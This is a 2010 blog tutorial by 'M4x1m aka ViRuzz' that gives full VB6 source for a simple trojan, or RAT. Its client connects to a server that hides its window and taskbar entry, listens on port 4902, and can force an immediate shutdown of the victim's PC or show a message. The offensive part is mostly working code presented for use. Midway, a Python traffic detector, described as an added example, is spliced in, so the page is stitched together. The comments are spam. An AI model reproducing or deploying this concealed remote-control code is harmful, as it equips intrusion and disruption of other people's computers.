Saturday, July 3, 2010

How to make a simple VB6 Trojan/RAT by M4x1m aka ViRuzz

Welcome to my tutorial on how to code a simple VB6 Trojan. We will use the Direct Connection, where you have to enter the IP of the Remote Computer, where the Server is Running. Trojans are also known as "RATs" (Remote Administration Tools or Remote Access Trojan).

How they work:
You start your program called "server" on a computer, go back to your own computer, enter the IP of the other computer and hit connect. If the firewall or antivirus doesn't block the connection, you have successfully established the connection between the computers using Winsock controls. There are two types of RATs: Direct Connection (we will use this) and Reverse Connection.

So let's begin with the Tutorial. First we will code the "Client". In the Client you enter the IP and click connect:

The Client

Open up VB6, and create a "New Project". Name it whatever you want; I suggest "RAT Client".

Paste from the ToolBox these Controls:

* three TextBoxes (NAMES: 1 Textbox: Text1, 2 TextBox: Text2, 3 TextBox: Text3)
* 4 Buttons (Names: 1 Button: Command1, 2 Button: Command2, 3 Button: Command3, 4 Button: Command4)
* Winsock (Find it under Components)(NAME: Winsock1)
* 3 Labels (Names: 1 Label: Label1, 2 Label: Label2, 3 Label: Label3)


Ok now, design the GUI. It should look like this:


- Command1 is Used to Connect to the Server
- Command2 is Used to shutdown the Remote PC
- Command3 is used to send a Message
- Command4 is used to Disconnect from the Server
- Text1 is used to enter the IP you want to connect
- Text2 is used to enter the Port on which you want to connect
- Text3 is used to send a message to the Server
- Winsock1 is used to send Data/Requests to the Server

Ok, lets start with the Code.

After you added all the Buttons etc. double click on your Form, and paste this code at the top of all other code:
-
Private Const SPLITTER As String = "{Ex}"
-

Explanation: This is the string you will use to split your data.

Double Click Command1 (Used to Connect to the Server) and paste this code:
-
Command1.Enabled = False
Winsock1.Close
Winsock1.RemoteHost = Text1.Text
Winsock1.RemotePort = Text2.Text
Winsock1.Connect
-

Explanation:

1. Line: Disables the connect button.
2. Line: Closes all other connections.
3. Line: The remote host is the IP or computer name of the target computer.
4. Line: The port on which the Client should connect to the Server.

Double click the "Shutdown" button (Command2) and write this code:
-
If Winsock1.State = 7 Then
    Winsock1.SendData "Shutdown"
Else
    Label3.Caption = "Error you need to connect first."
End If
-

Explanation:

1. Line: Checks if winsock is connected. 7 = connected.
2. Line: Sends the string "Shutdown" to the server.
3. Line: If it is not connected.
4. Line: Tells the user to connect first.

After that Double Click Command3 (Send Message) and write this code:
-
If Winsock1.State = 7 Then 'Checks if winsock is connected. 7 = connected
    Winsock1.SendData "Message" & SPLITTER & Text3.Text
Else
    Label3.Caption = "Error you need to connect first."
End If
-

Explanation:

1. Line: Checks if winsock is connected. 7 = connected.
2. Line: Sends a string that can be separated into two sections to the server. Section (0) will contain the command "Message" and section (1) will contain the message.
3. Line: If it is not connected.
4. Line: Tells the user to connect first.

Now double Click the last Button called Command4. It is used to Disconnect from the Server.
-
Winsock1.Close
Label3.Caption = "Disconnected"
Command1.Enabled = True
-

Explanation:

1. Line: Closes the Socket.
2. Line: Shows that we successfully disconnected.
3. Line: Re-enables the "Connect" Button (Command1).

After that, go to your Winsock and select Winsock1_Close. Paste there the same code from the last step.

The Last Step on the Client. Select Winsock1_Connect. Paste there this code:
-
Label3.Caption = "Connected to " & Winsock1.RemoteHostIP
-

Explanation:

1. Line: Refreshes the Label3 and shows that we are successfully connected.

Done! You are done with your Client! Save the Project, and build it. Name it "Client.exe".


The Server


Make a new Project in VB6, and name it "Server". Again add Winsock (Winsock1) from the components.

After that, double click your Form1. Enter this code at the top of all other code:
-
Private Const SPLITTER As String = "{Ex}"
-

Explanation:

1. Line: As explained for the Client, it is used to split your data.

Ok, go back to your Form1, and double click it again. Paste this code at Form1_Load:
-
Me.Visible = False
App.TaskVisible = False
Winsock1.LocalPort = "4902"
Winsock1.Listen
-

Explanation:

1. Line: Hides the Form1. Makes it Invisible.
2. Line: Disables "ShowInTaskbar". Invisible in the Task Bar.
3. Line: Sets the Port the Server has to listen on.
4. Line: Lets the Server listen on the specified Port.

Ok, now select Winsock1_Close. This is what the server has to do if the Client disconnects. Paste this code:
-
Winsock1.Close
Winsock1.LocalPort = "4902"
Winsock1.Listen
-

Explanation:

1. Line: Closes the Winsock.
2. Line: Re-opens the Port.
3. Line: Listens on the specified port.

Ok now select Winsock1_ConnectionRequest. Paste this code:
-
Winsock1.Close
Winsock1.Accept requestID
-

Explanation:

1. Line: Closes the Winsock.
2. Line: Accepts any Incoming Connection from any Client.

Now the last step, but the most important one for getting all the functions to work. Select Winsock1_DataArrival. Paste this code there:
-
Dim Temp As String
Dim Temp2() As String
Winsock1.GetData Temp

Temp2 = Split(Temp, SPLITTER)
Select Case Temp2(0)
    Case "Shutdown"
        Shell "shutdown -s -t 00"
    Case "Message"
        MsgBox Temp2(1)
End Select
-

Explanation:

1. Line: Makes the string that will hold the data being transferred.
2. Line: Makes a string array that will hold the split sections.
3. Line: Gets the sent data and dumps it into the Temp variable.
4. Line: Splits the Temp variable into sections using the delimiter SPLITTER, which is = "{Ex}".
5. Line: Checks the value of the first part of our string.
6. Line: If the first part of the string is "Shutdown"...
7. Line: ...then it runs a shutdown script.
8. Line: If the first part of the string is "Message" then...
9. Line: displays a message box with the section of the string in the body text.
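
Seen from the defending side, the traffic this handler accepts is plaintext and unauthenticated, with fixed command strings, the "{Ex}" delimiter and TCP port 4902, so it can be recognised in captured payloads. The Python below is an added example, not part of the original tutorial; the flow record shape, the function names and the sample addresses are assumptions made for the illustration.

```python
import re

SPLITTER = b"{Ex}"      # delimiter constant from the tutorial
TUTORIAL_PORT = 4902    # Winsock1.LocalPort in the tutorial's server
# TCP has no message boundaries, so several sends may arrive in one segment:
# zero or more bare "Shutdown" commands, then optionally one "Message{Ex}<text>"
# whose text runs to the end of the segment.
SEGMENT_RE = re.compile(
    rb"(?P<shut>(?:Shutdown)*)(?:Message" + re.escape(SPLITTER) + rb"(?P<text>.*))?",
    re.DOTALL,
)

def parse_segment(payload: bytes):
    """Return [(command, text_or_None), ...] or None if the payload is not this protocol."""
    m = SEGMENT_RE.fullmatch(payload)
    if not payload or m is None:
        return None
    cmds = [("Shutdown", None)] * (len(m.group("shut")) // len(b"Shutdown"))
    if m.group("text") is not None:
        # Assumption: single-byte text on the wire; latin-1 never fails to decode.
        cmds.append(("Message", m.group("text").decode("latin-1")))
    return cmds

def triage(flows):
    """flows: (src, dst, dst_port, payload) tuples, a hypothetical record shape."""
    alerts = []
    for src, dst, port, payload in flows:
        cmds = parse_segment(payload)
        if cmds is None:
            continue
        # "Shutdown" alone is an ordinary word, so it only counts on the tutorial
        # port; the "Message{Ex}" prefix is specific enough to alert on any port.
        if port == TUTORIAL_PORT or any(name == "Message" for name, _ in cmds):
            alerts.append({"src": src, "dst": dst, "port": port,
                           "commands": [name for name, _ in cmds]})
    return alerts

# Constructed sample traffic (addresses and payloads are made up for the example).
SAMPLE_FLOWS = [
    ("10.0.0.5", "10.0.0.9", 4902, b"Message{Ex}hello"),
    ("10.0.0.5", "10.0.0.9", 4902, b"ShutdownShutdown"),
    ("10.0.0.7", "10.0.0.9", 8080, b"Message{Ex}other port"),
    ("10.0.0.7", "10.0.0.8", 80, b"GET /Shutdown HTTP/1.1\r\n\r\n"),
    ("10.0.0.7", "10.0.0.8", 443, b"Shutdown"),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_FLOWS):
        print(alert)
```
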

Finally you have done your server! Now save the Project and Build it. Save it as "Server".

Enjoy, you just made your RAT!

This tutorial was written by M4x1m aka. ViRuzz (me). Enjoy it!

2 comments:

  1. Best Software Downloads and Reviews. the most comprehensive source for free-to-try software downloads on the Web BEST 4 DOWNLOADS

  2. yes i like above all the programs and it's really wonderful ,,,,